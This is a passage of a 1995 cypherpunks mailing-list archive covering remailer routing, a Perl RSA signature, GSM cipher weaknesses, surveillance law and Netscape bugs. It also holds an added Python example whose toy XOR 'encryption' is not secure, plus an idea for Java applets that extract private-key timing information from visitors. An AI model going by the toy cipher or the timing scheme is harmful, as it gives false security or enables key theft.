again I think the FCC required that too.

-Paul

--
Paul Robichaux, KD4JZG | perobich@ingr.com
Intergraph Corporation   | http://www.intergraph.com
Be a cryptography user.  | Not speaking for Intergraph
Co-author, "Building Internet Appls With Visual C++", Que Books 
(0-7897-0213-4)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 15 Dec 95 11:01:53 PST
To: cypherpunks@toad.com
Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512151900.LAA15457@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Dec 1995, Alice de 'nonymous wrote:

> Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
> from Netscape for finding the HUGE security flaws in Netscape's existing 
> product line??
>
> Alice de 'nonymous ...               <an455120@anon.penet.fi>
                                       ^^^^^^^^^^^^^^^^^^^^^^^^

Heh, hey Alice, you know this discussion a short time ago where you
claimed that you wouldn't use PGP for signing because it wasn't secure
or something, what's with the use of the penet address?

Surely a penet address offers even less protection for your id?

Or have you done something nifty like create the penet address with a
nymserver address?

(the real)

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNHFeIbu8OQjKS7RAQFsmAP/SKKz7XCVmTxUQhLL+IEQaleMaTgp+rCO
GAsCDcESY6DBDd3NLR07fkNxZufGxyTFqOeL8SFlH5fMGYvwuLrytLwc9guqkr5I
aAXiq+hz13GHhoCkr0SnK+ti1M8ERj8EwTvyUWHnUy4b3Nb4K8oD0OzgZwcHVMkP
jvdsCUnQQfo=
=z2td
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Ziegast <ziegast@va.pubnix.com>
Date: Fri, 15 Dec 95 08:55:21 PST
To: dlv@bwalk.dm.com
Subject: Obfuscating traffic flow (Re: : Pornographic stories)
In-Reply-To: <Dgo5FD5w165w@bwalk.dm.com>
Message-ID: <LAA13661.199512151654@pub01.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


>>   So:
>>           What is the "real" reason for opposition to     
>>           strong crypto?  Who "really" benefits?  (and please
>>           don't mention the LE types 'cause I don't believe it).

A company may not want their employees to use crypto because they
want to be able to monitor their traffic.  When a company becomes
paranoid about trade secret protection or corporate espionage,
worker's privacy is one of the first things to go.  It's the
company's choice though.  They may or may not know the legal can of
worms they'd be opening.

I can understand why LE types might be against strong crypto traffic,
but I'm not allowed to mention them here. ;^)

I would think that ISPs (and even commercial online services) would
prefer that their customers use strong crypto because it's less for
them to worry about ("Are they really sending pornography or death
threats through our network?").

The current protection for some service providers (at least the ones
with Internet-savvy lawyers) is primarily contractual.  They have
their users agree to service agreements before their users are allowed
to use their service.  Search your ISP service agreement for phrases
like ("customer holds harmless and indemnifies Company" or "does not
monitor traffic in any way" or "not responsible for data transmitted").

>>   and:
>>           Anyone else want to participate in the great '90's
>>           uucp revival?  I'm in Santa Clara and could use
>>           some feeds and some help with the setup.
>
> I'm all for it. My site is connected to the rest of the world via dial-up
> UUCP, I haven't touched the setup in 5 years, and am not planning to.
> 
> It might be interesting to have a variation of dial-up UUCP where site 1
> passes encrypted stuff to site 2 and doesn't quite know what site 3 they're
> supposed to go on to. Sort of like the remailers with encryption.

Mail flow obfuscation...

UUCP is only a store-and-forward transport mechanism.  The functionality
you're looking for just depends on the command you execute on the far
end.  People currently use something similar to:

	uux -p -r -z site1!rmail site2!site3!user
     or
	uux -p -r -z site1!rmail site3!user	(if it's known that site1
						 can figure out how to forward
						 mail to site3)

You'd basically be looking for another type of remailer that decrypts
a message to find out how to send it along to the next hop.

On the sender's system, one could:

	cat message \
		| pgp -feast user \
		| encapsulate site3 \
		| encapsulate site2 \
		| encapsulate site1 \
		| uux -p -r -z site1!decap_remail

At site1, decap_remail would look into the message, decrypt it,
and know to forward it to site2...

	cat message \
		| uux -p -r -z site2!decap_remail

When it forwards the message, any information about where it got the
message from would be stripped (i.e. strip "Received:" or "From "
information it forwarded).  Bounces go to /dev/null.  The removal
of return path information is the most important part of this
process.

At site2, we decrypt and forward to site3:

	cat message \
		| uux -p -r -z site3!decap_remail

At site3, we decrypt and find no message to forward, so it gets
sent to the local mailer for the user (message still encrypted).

Pros: At any point during the transmission, a site only knows the
      previous hop, and the next hop, and the rest is garbage.

      The message is encrypted throughout delivery in such a way
      that to trace a message, you need cooperation from all
      system administrators along the way (use long hop paths
      for more security!).

Cons: Debugging message routing problems is nearly impossible.
      One could possibly get around this by having the recipient
      confirm that the message was received.

      CPU utilization on the mailers would be more than the
      normal bit-shuffling.

      The sender needs to know the explicit path to get from point
      A to point X, to point Y, to point Z.  Either the user has
      to have key exchanges with each mailer down the path, or a
      public key system (can you say "UUCP maps"?) needs to exist
      so that any user with the maps can encrypt for any other
      mailer out there.

To optimize the process, one would only encrypt the envelope
information and leave the message intact (leaving it to the
user to encrypt).

Note: You don't need UUCP for this.  Any smart mailer like Sendmail
      or Smail can be configured for something like this.  You
      just need 10-20 sites in the Internet willing to provide this
      remailing service (for example, anon.penet.fi might be one).
      The goal is to make it administratively hard for people to
      compute traffic flow.  One would still use end-end encryption
      to protect message content.

--
Eric Ziegast

PS:  I don't read cypherpunks.  Someone forwarded this to me because
     they thought I'd be interested in the "UUCP" aspect.  If you
     respond and want me in on the discussion, feel free to CC: me.

PPS: Disclaimer: I'm not a crypto newbie.  Don't assume I know what
     I'm talking about.
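
The layered-envelope routing described in the message above, as an added Python example; it is not the author's `encapsulate` or `decap_remail`, which the post only names. The `CAPSULE` label format, the `Received:` trace line, the per-site shared secrets and the toy keystream that stands in for PGP are all assumptions made for the illustration.

```python
import hashlib

# Constructed per-site secrets standing in for each mailer's PGP key pair.
SITE_KEYS = {
    "site1": b"k1-constructed",
    "site2": b"k2-constructed",
    "site3": b"k3-constructed",
}
MAGIC = b"CAPSULE "


def xor_layer(site, data):
    """Toy keystream XOR (assumption, replaces PGP; no integrity). Self-inverse."""
    stream = hashlib.shake_256(SITE_KEYS[site]).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, stream))


def encapsulate(site, data):
    """Sender side: wrap `data` so that only `site` can read what is inside."""
    return MAGIC + site.encode() + b"\n" + xor_layer(site, data)


def transport(prev_site, next_site, data):
    """What a store-and-forward hop adds on delivery: a trace header."""
    trace = b"Received: from " + prev_site.encode() + b" by " + next_site.encode()
    return trace + b"\n" + data


def decap_remail(site, delivered):
    """Mailer side: drop trace headers, peel one layer, decide where it goes.

    Returns (next_site or None, payload_to_forward, what_this_site_learned)."""
    prev = None
    # Return-path information is removed here and never forwarded.
    while delivered.startswith((b"Received:", b"From ")):
        header, delivered = delivered.split(b"\n", 1)
        if header.startswith(b"Received:"):
            prev = header.split()[2].decode()
    label, body = delivered.split(b"\n", 1)
    if label != MAGIC + site.encode():
        raise ValueError("capsule is not addressed to this site")
    inner = xor_layer(site, body)
    if inner.startswith(MAGIC):
        # Another capsule inside: its cleartext label names the next hop.
        next_site = inner.split(b"\n", 1)[0][len(MAGIC):].decode()
        return next_site, inner, {"prev": prev, "next": next_site}
    # Nothing left to forward: hand the (still end-to-end encrypted) mail
    # to the local mailer.
    return None, inner, {"prev": prev, "next": None}


def send(path, sender, message):
    """Wrap `message` for `path`, innermost hop first, then walk the hops.

    Returns (bytes handed to the local mailer, per-site view of the route)."""
    data = message
    for site in reversed(path):
        data = encapsulate(site, data)
    seen, here = {}, path[0]
    data = transport(sender, here, data)
    while True:
        nxt, inner, learned = decap_remail(here, data)
        learned["forwarded"] = inner
        seen[here] = learned
        if nxt is None:
            return inner, seen
        data, here = transport(here, nxt, inner), nxt


if __name__ == "__main__":
    # Constructed placeholder for the output of `pgp -feast user`.
    mail = b"-----BEGIN PGP MESSAGE----- constructed placeholder"
    delivered, seen = send(["site1", "site2", "site3"], "sender-host", mail)
    for site, view in seen.items():
        print(site, "previous hop:", view["prev"], "next hop:", view["next"])
    print("delivered intact:", delivered == mail)
```

Each site's view holds only its previous and next hop, and what it forwards carries no trace header from earlier hops, which is the property the post calls the most important part of the process.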




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 15 Dec 95 16:18:52 PST
To: Anonymous <nobody@replay.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512151901.UAA10562@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951215154703.12878C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 15 Dec 1995, Anonymous wrote:

>      It's kind of cool how much faith you have in the idea that
> your number is unlisted, considering the fact that you started
> this thread by griping that someone had the goods on you. The
> reason you were "taken aback" is because your beliefs don't
> correspond to reality -- "cognitive dissonance," in the lingo.

1) I have no faith in my number being unlisted, I merely 
   mentioned my contractual expectation.

2) I was not griping.  I was requesting information (of which
   "Anonymous" is apparently bereft).

3) Being "taken aback" refers to surprise (look it up).  Far
   from the meaning of "cognitive dissonance."

"Assuming facts not in evidence," in the lingo.

So what DO you know, "Anonymous"?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 16 Dec 95 06:32:16 PST
To: cypherpunks@toad.com
Subject: Re: e$: Seven Days
Message-ID: <v02120d0cacf887cdad9a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:36 AM 12/16/95, Timothy C. May wrote:

>By the way, in honor of the "geodesic network" and "geodesic payment
>systems," and the geodesic dome the party was in, I propose we rename "e$"
>with a more fitting name: "buckybucks." Or just "buckys" for short. ("Did
>you remember to replenish the buckybits?")

Snoop Bucky Bucks?

Sounds like a Cyberdog part to me...

<ducking many tomatoes>

Maybe not...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sun, 17 Dec 95 18:43:47 PST
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
Message-ID: <199512180304.VAA12327@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 12/15/95 -0800, you wrote:

>	My AT&T 900 (or is it 9000?) MHz digital cordless phone says
>the same thing. I figure it uses a weak cryptosystem. There is
>something about key setup when you return the handset to the base.
>	(The phone was $200, FWIW)

That just refers to the fact that it is no longer legal to sell
scanners that can listen in to that range.  The same is true
of the 800 MHz band (used for a lot of cellular phone traffic).
Ah, I love my really old scanner that isn't bound by such
limitations...  (BTW, a couple of years ago Nuts & Volts ran
an article with information on a program and some toys that let
a laptop computer, properly wired into a cell phone, act as a
cell scanner.  Never did wire it up, but it looked like fun ;)

ObCrypto: um, if you can find it, let me know :)


----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864
Quote: "If I wanted thrills and danger and lots of rampant violence,
I coulda been a postal worker!"  -- Ben, "Sensational Spider-Man"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard D. Sheffar" <rick@muskoka.net>
Date: Sun, 17 Dec 95 19:17:32 PST
To: aba@atlas.ex.ac.uk
Subject: Re: BIO-MUNITION: gifs of perl-RSA tattoo
In-Reply-To: <730.9512122013@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.BSD/.3.91.951217221057.9112A-100000@segwun.muskoka.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Dec 1995 aba@atlas.ex.ac.uk wrote:

> 
> People have been reading the list for a while will be familiar with
> this piece of perl code used as a non-exportable, supposedly ITAR
> controlled .sig:
> 
> 
> #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
> $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
> 2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
> pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
> 
Okay, I admit it, I don't know everything.
What does the perl script actually do?
I saved to file, chmod 777 perly,
tried running the script and kept getting error line 3.
What does it do, does it encrypt a file or what? What have I done wrong?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: PGP Signed with PineSign 2.2

iQBVAgUBMNTcedZnjIiISvIVAQF7IwH7BufPIuyXuJy6LJOsUnxJYIzv7GAly4FL
OWL8xHaKZb/7Ltepmeyd988TM+3DAmIDzEW2EdX5Nwia8Scst3TnoA==
=/gW7
-----END PGP SIGNATURE-----
 
Please report any Strange behaviour by the Mail Monster to rick@muskoka.net
****************************************************************************** 
send mail w/ subject 'send help', To get Commands accepted by Mail Monster.  
rick@muskoka.net   rick.sheffar@primetime.org  
PGP encrypted mail accepted and preferred!     
PGP key ID  0x884af215
PGP key finger print = 01 49 EA C6 42 90 21 02  9D CB 19 7E E3 23 66 58
******************************************************************************
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 17 Dec 95 14:24:52 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: BosniaLINK (and other unnecessary posts)
In-Reply-To: <199512171340.OAA14680@utopia.hacktic.nl>
Message-ID: <Pine.BSD.3.91.951217220655.14110B-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



attila sez:

    it seems unreasonable to stifle all of the associated political 
posturing and infomercials from our "only natural criminal class" [Mark 
Twain], but I took 10 days of the full list and ran it through some of 
text processing and retrieval routines --80% of the characters delivered 
contain _only_ policy arguments, and another 10% are more or less off the 
mark.  

    No one has time to monitor (moderate) the list to reduce this load
--are we ready to turn that job over to hardwire analysis? [I see little 
value in AI in this case, but I'm sure some will disagree <g>.]

    Let's put it this way: if we were a radio or television station, 
they'd pull the plug for our static or white snow....

    procmail gets rid of Dr. Fred, or even the mention of Dr. Fred, but is
not intelligent enough to sort for the presence of key words from either
side of the fence (you must pass it if there are technical references even
though Bubbha appears in the text). 

   I have more than adequate text retrieval and text syntactic routines 
--is that where we are headed?

On Sun, 17 Dec 1995, Anonymous wrote:

> 
> URL: http://www.dtic.dla.mil/bosnia/
> 
>    BosniaLINK Banner
>    
>    Welcome to BosniaLINK, the official Department of Defense information
>    system about U.S. military activities in Operation JOINT ENDEAVOR, the
>    NATO peacekeeping mission in Bosnia. This system is provided by the
>    Office of the Assistant to the Secretary of Defense for Public
>    Affairs. All information in BosniaLINK is publicly released
>    information from the U.S. government or NATO headquarters.
>    
>    BosniaLINK contains operation maps, fact sheets, news releases,
>    biographies of key commanders and leaders, and transcripts of
>    briefings, speeches and testimony. It is also hyperlinked to the NATO
>    and State Department information services.
>    
>    
>      
> _________________________________________________________________
> 
>    
> Contents
> 
>      * Maps (Dec 8)
>      * Fact Sheets (Dec 12)
>      * News Releases (Dec 15)
>      * Photos (Dec 15)
>      * Biographies of Key Commanders and Leaders (Dec 15)
>      * Transcripts of Briefings (Dec 15)
>      * Speeches and Testimony (Dec 15)
>        
>    
>      
> _________________________________________________________________
> 
>    
>    
>    
>   RELATED SITES FOR BOSNIA INFORMATION
>   
>    Air Force Role in Bosnia
>    NATO
>    U.S. State Department: U.S. Policy on Bosnia
>    Navy News Service: Bosnia Operations
>    
>    
>    
>      
> _________________________________________________________________
> 
>    
>    BosniaLINK is provided through the cooperative efforts of the Office
>    of The Assistant to the Secretary of Defense (Public Affairs), and the
>    Defense Technical Information Center. This is a government computer
>    system.
>    
>    
>      
> _________________________________________________________________
> 
>    
>    DefenseLINK Home
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 17 Dec 95 14:33:43 PST
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512171141.NAA02997@trance.olari.clinet.fi>
Message-ID: <E0tRRco-0003nh-00@bescot.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I got the following from mjos@math.jyu.fi a couple of months ago.
> Unfortunately I was unable to attend or listen on mbone.  Does anyone
> know more about this?

Yes -- we have analogue A/V on a VHS cassette, digital MBone recording on M/O,
and an abstract ... see below.

>>                  University of Cambridge Computer Laboratory
>>                                SEMINAR SERIES
>> 10th October    Bill Chambers, King's College, London
>>                PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK CONTROL
>> GSM:n salausalgoritmi on juuri tuota tyyppiä. Chambers yritti pitää tuota
>> nimenomaista esitelmää jo yli vuosi sitten, mutta silloin viralliset tahot
>> puuttuivat asiaan ja esitys peruttiin. Hän on löytänyt algoritmista aukkoja,
>> joiden avulla purkuaika saadaan erittäin lyhyeksi.
>> ps. ne meistä, jotka pääsevät mboneen käsiksi, voivat seurata tapahtumia
>>     livenä  :)
> [Free translation: The GSM encryption algorithm is of exactly that
> type.  Chambers tried to have this particular presentation over an
> year ago, but at that time the official side interfered and the
> presentation was cancelled.  He has found holes in the algorithm that
> can be used to make decryption (without key) very quick.
> PS.  Those of us who can get access to mbone, can follow it live.]

<TITLE>Security Group Seminar, 10th October 1995</TITLE>
<H1>Security Group Seminar, 10th October 1995</H1>

  <HR>
  <DL>
    <DT>Speaker:
      <DD>Bill Chambers, King's College, University of London<P>

    <DT>Date:
      <DD>Tuesday 10th October<P>

    <DT>Place:
      <DD>Room TP4, Computer Laboratory<P>

    <DT>Title:
      <DD>PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK CONTROL<P>
  </DL>

    The speaker has been looking at the cycle structure of an algorithm
    posted just over a year ago on the Internet and alleged to be the
    secret A5 algorithm used for confidentiality in the GSM mobile
    telephone system. This algorithm employs three mutually
    clock-controlled shift registers, and can fairly quickly enter a
    loop with what is essentially the shortest possible period, a
    number very small compared with the total number of states, or even
    its square root. Moreover this behaviour is robust, not being
    influenced by factors such as choice of primitive feedback
    polynomial or even clocking logic (with a proviso to be
    discussed).  A fairly straightforward explanation for this
    behaviour has been found. Some ways of getting around the problem
    of excessively short periods are considered, as well as the
    behaviour of systems with different numbers of mutually clocked
    registers. In particular a mention is made of the wartime T52e
    cipher, perhaps the inspiration for "alleged A5".<P>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Dec 95 05:54:49 PST
To: cypherpunks@toad.com
Subject: GLO_bul
Message-ID: <199512181354.IAA29000@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-18-95. NYPaper:


   "His Goal: Keeping the Web Worldwide."

      An adoration of selfless Tim Berners-Lee with a 
      pan gloss of the World Wide Web Cartel.


   "From Mainframes to Global Networking."

      I.B.M.'s selfless strategy for Net supremacy, 
      hand-in-hand with altruistic AT&T and eleemosynary 
      Microsoft.


   GLO_bul  (17kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 19 Dec 95 19:02:36 PST
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Is ths legal?...
In-Reply-To: <skp7EKS00YUvAEUFUm@andrew.cmu.edu>
Message-ID: <9512182021.AA23246@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



>    The answer to the "is this legal?" question is more complex than 
> simply "private versus public" university.  There are fairly strict 
> federal anti-wiretapping laws.  It is hardly clear that a private 
> university may eavesdrop on students' phone or computer conversations, 
> even if conducted over the university's network.  Furthermore, many 
> states have their own anti-wiretap and anti-eavesdrop laws, which are 
> even stricter than federal standards.  I don't have the time nor the 
> inclination to do research into Oklahoma law, but we did some research 
> into this area of state and federal law for the LaMacchia case and 
> concluded that in its investigation of David LaMacchia, MIT very well 
> might have violated federal laws.

It is definitely legal for private entities to have strict control over
their own resources.  In particular, it is legal for a company to listen
in on their phone conversations for quality control purposes if they
announce this fact ahead of time (you may have heard such a disclaimer
when you call tech support, for instance).

Also, if a student signs such a waiver acknowledging that the situation
at this school is not necessarily that of the "norm" or of potentially
overriding state or federal law, there is a good chance the student has
signed away their right/privilege of absolute privacy.  Unless there
is serious violation of Constitutional rights or if the contract is
constructed or negotiated in bad faith or in some illegal manner, the
old saying applies:  "a contract is a contract".

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Mon, 18 Dec 95 20:02:48 PST
To: cypherpunks@toad.com
Subject: Java and timing info - second attempt
Message-ID: <9512190402.AA12992@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



I asked about using Java scripts to capture remote timing info before and  
got no response.  I assume everyone thought it was a stupid question.   
Therefore, I'll ask it again.

The thing that makes Java a big deal is that you execute other people's  
code on your machine.  You browse a Java-enhanced Web page, click on  
something interesting, suck across an applet, and execute it on your  
machine.  This setup enables a bunch of nifty interactive Web stuff.

Turn the picture around:  You set up a Java-enhanced Web page, include some  
interesting buttons to click, write some clever applet, and people around  
the world suck your applet onto their machine and execute it.

Combine this with a standard crypto API for doing Web-based digital  
signatures or authentication or encryption and you may begin to see some  
possibilities.

Would it be possible to create a Java applet that causes the client  
machine to sign or encrypt something with their private key, and then send  
back timing info?

For the answer to be YES a few things need to be true.  There needs to be  
some sort of standard crypto API in use that can be accessed by a Java  
script, and Java scripts need to be able to capture and send back timing  
info.  Does anyone on this list know enough about Java to know if it can  
do any of these things?

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 19 Dec 95 07:58:08 PST
To: cypherpunks@toad.com
Subject: Re: (fwd) Economics of Digital Money.
Message-ID: <199512191557.HAA20962@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> But electronic checking it is a substitute for 
> conventional checking, it would just increase the 
> speed of the transaction.  From the economic standpoint,
> there is no difference in the dynamics of the checking 
> process from normal checks

And email is no different from mail, right?

Wrong:  When computer programs start spending money and receiving
money on behalf of their masters, we will see vast economic
changes.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwwziff@internet.com (ZD Net / World Wide Web Edition)
Date: Tue, 19 Dec 95 06:04:36 PST
To: wwwedition@ziff.com
Subject: ZD Net Update v.1 #4
Message-ID: <199512191404.JAA25130@yipee.internet.com>
MIME-Version: 1.0
Content-Type: text/plain


______________________ZD Net Update_______________________ 
v. 1 #4                                           12-11-95

Welcome to ZD Net Update, the free E-mail newsletter created 
especially for registered users of Ziff-Davis Interactive's ZD 
Net/World Wide Web Edition. ZD Net Update is a bi-weekly bulletin 
that alerts you to new and exciting developments on ZD Net.

In this issue:

> YAHOO, ZIFF-DAVIS ANNOUNCE PLAN TO JOIN FORCES 
> PC MAGAZINE UNWRAPS ITS 1995 HOLIDAY GIFT GUIDE 
> COMPUTING TRAILBLAZER HELPS YOU "BUY IT ONLINE"  

*     *     *     *     *     *     *     *     *     *

YAHOO, ZIFF-DAVIS ANNOUNCE PLAN TO JOIN FORCES

On Tuesday, December 12, Yahoo Corp. and Ziff-Davis Publishing Co. 
announced a strategic relationship that establishes a new, Web-
driven publishing model for delivering content via print, online, 
and CD ROM. The relationship leverages the expertise and brand names 
of Yahoo, operator of the leading directory on the Web, and Ziff-
Davis, the leading publisher of computer magazines and computing 
content online, including ZD Net. 

The new alliance is initially focused on two media products: Yahoo 
Internet Life and ZD/Yahoo Computing. Yahoo Internet Life is an 
interactive magazine based on one of the most popular sites on the 
World Wide Web. ZD/Yahoo Computing seeks to become the ultimate 
value-added, online directory of computing resources on the Web.

Yahoo Internet Life combines a Web site, a print publication, and a 
CD ROM. Each issue of the quarterly magazine will include a CD ROM 
that contains virtually everything in the magazine as well as the 
software that users need to connect to the Web. The print version of 
Yahoo Internet Life will debut on newsstands in February 1996. 

Bill Machrone, Editor-in-Chief of ZD Internet Life and Ziff-Davis's 
Vice President of Technology, was named Editor-in-Chief of Yahoo 
Internet Life.

ZD/Yahoo Computing will be the definitive online guide to finding 
and using computing resources on the Web. It will incorporate an 
enhanced version of The Computing Trailblazer, a popular feature of 
the ZD Net Web site that reviews computing sites on the Internet, as 
well as new features to help people find computing products, 
companies, and services. ZD/Yahoo Computing will be available in 
early 1996.

For more information about the announcement, including a Shockwave 
file and VDOLive video clips, check out the ZD Public Relations site 
at:
 http://www.zdnet.com/pr/


*     *     *     *     *     *     *     *     *     *

PC MAGAZINE UNWRAPS ITS 1995 HOLIDAY GIFT GUIDE

The holidays are fast approaching, you're faced with tons of folks
who need gifts, and you have no idea what to buy them. How to get in 
the holiday spirit? Don't despair. Your shopping list may be long, 
but PC Magazine's list of gift ideas is bound to be longer.

The editors at PC Magazine have gathered 101 of the best educational 
and entertainment products to hit the shelves since last holiday 
season. Nearly all of these products are Windows-based, except for 
the games, most of which run under DOS. 

For the youngest folks on your list, the Kids' Software section 
includes a selection of learning games covering all the basic 
subject areas, many of which star characters the kids will 
recognize. For those hard-to-please gamers, this holiday offers an 
abundance of riches in all categories: action and adventure games, 
arcade games and puzzles, strategy and  simulation games, and sports 
games. 

Looking for something a bit less frivolous? Then check out the 
reference offerings and the selection of personal productivity 
software. For gadget lovers, there's a fun and funky array of PC 
peripherals that would look great on any desktop. And don't miss the 
list of 10 great gifts under $35. 

So forget about fretting over that holiday shopping list. PC 
Magazine gives you 101 reasons to celebrate this holiday season. 
Discover a little holiday cheer at:

 http://www.zdnet.com/~pcmag/issues/1422/pcm00154.htm


*     *     *     *     *     *     *     *     *     *

COMPUTING TRAILBLAZER HELPS YOU "BUY IT ONLINE"

Looking for an easier way to get your hands on the latest hardware 
and software? Why not go online?

Introducing "Buy It Online," the newest category in The Computing 
Trailblazer, Ziff-Davis's guide to computing resources on the Web. 
Each of the nearly two dozen sites that are reviewed in Buy It 
Online offers a strong selection of computer products for sale, and 
many also enable online purchasing (which is likely to become a firm 
requirement for this category in the near future). Some of the sites 
provide links to manufacturers' sites and other Internet resources 
of value to their customers. Others are just plain fun to visit for 
their contests, downloads, and freebies. A few are works in progress 
that show great potential.

What are the common characteristics that mark the better sites? For 
starters, secure credit-card transactions, up-to-date price lists, 
and catalog items that link to product information combining 
overview articles, feature lists, and tech specs. 

If you order computer products on the Web, please click the Feedback 
button to tell the Trailblazer editors what your experience was like. 
Good or bad, Trailblazer wants to know about it.

For the latest word on the best computing sites, including more than 
300 (and growing) site-reviews under familiar computer headings, 
check out Trailblazer today at

 http://www.zdnet.com/~zdi/tblazer/


*     *     *     *     *     *     *     *     *     *

ZD Net Update is the official newsletter of ZD Net/World Wide Web 
Edition. It is compiled by Tom Schmidt (tom_schmidt@zd.com). Feel 
free to respond with news, notes, comments, or suggestions. To 
unsubscribe to ZD Net Update, point your browser to:

 http://www.zdnet.com/cgi-bin/ziffmail.pl/update

and select 

 "Unsubscribe to ZD Net Update."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jwarren@well.com (Jim Warren)
Date: Tue, 19 Dec 95 09:17:11 PST
To: holovacs@styx.ios.com
Subject: Re: Oklahoma University: Is this legal?...
Message-ID: <v02120d1dacfb9255dcd6@[153.36.101.40]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:09 PM 12/17/95, sethf@MIT.EDU wrote:
>        c) someone decided that everything stored on the University's
>computer system was therefore a "public record" (since the computer is
>"owned" by the public), and thus had to be accessible by law.

Uh, every PRA (public records act) in the nation has extensive exceptions
-- for school records, collective bargaining, various investigative
records, etc.

NO state PRA or federal FOIA declares blanket access to all public-agency
records -- often justifiably; sometimes for agency arse-covering.

--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 19 Dec 95 06:32:17 PST
To: cypherpunks@toad.com
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netsca
Message-ID: <9512191432.AA28817@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff writes:
> This report is mostly bogus.  Netscape does not, and never
> has stored http auth passwords in files on your disk.  However
> we do cache documents from servers that use http auth.
> In this case the user had their preferences set to check the
> host site for updated content "once per session".  There is
> a bug, which we are fixing before 2.0 ships, that if the
> auth fails the document should be removed from the cache but
